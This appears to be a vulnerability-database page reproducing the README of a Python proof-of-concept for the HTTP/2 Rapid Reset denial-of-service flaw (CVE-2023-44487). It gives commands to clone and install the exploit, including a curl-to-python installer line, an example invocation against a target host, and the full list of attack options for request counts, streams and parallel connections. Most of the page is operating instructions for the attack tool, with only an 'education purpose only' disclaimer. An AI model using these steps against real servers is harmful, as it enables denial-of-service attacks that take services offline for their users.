CVE-2023-44487 PoC — Apache HTTP/2 资源管理错误漏洞

Description

A python based exploit to test out rapid reset attack (CVE-2023-44487)

介绍

# HTTP2 Rapid Reset Attack: CVE-2023-44487
Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only

# Exploit: 
Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only

## Table of Contents

- [Installation](#installation)
- [Usage](#usage)

## Installation

Clone the repository to your local machine using Git, install poetry, and run the program:

   ```bash
   git clone https://github.com/studiogangster/CVE-2023-44487.git

   cd CVE-2023-44487

    # install Poetry, if you haven't already:
    curl -sSL https://install.python-poetry.org | python -
    
    # poetry install
    poetry install

    # Activate the virtual environment created by Poetry:
    poetry shell

    # Run Help
    python main.py

   ## Example:
   python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100  --max_streams 20 --parallel_connections 2
```

## Usage
Usage: main.py [OPTIONS]
```bash
Options:
  --host TEXT                     Host URL  [required]
  --path TEXT                     Path on the host  [required]
  --headers TEXT                  Headers (comma-separated)  [required]
  --port INTEGER                  Port number  [required]
  --requests_count INTEGER        Number of requests to be sent  [required]
  --max_streams INTEGER           Maximum streams to be opened in parallel
                                  [required]
  --parallel_connections INTEGER  Number of parallel connections to be made
                                  with the server. (TCP connection)
                                  [required]
  --help                          Show this message and exit.

```

文件快照

备注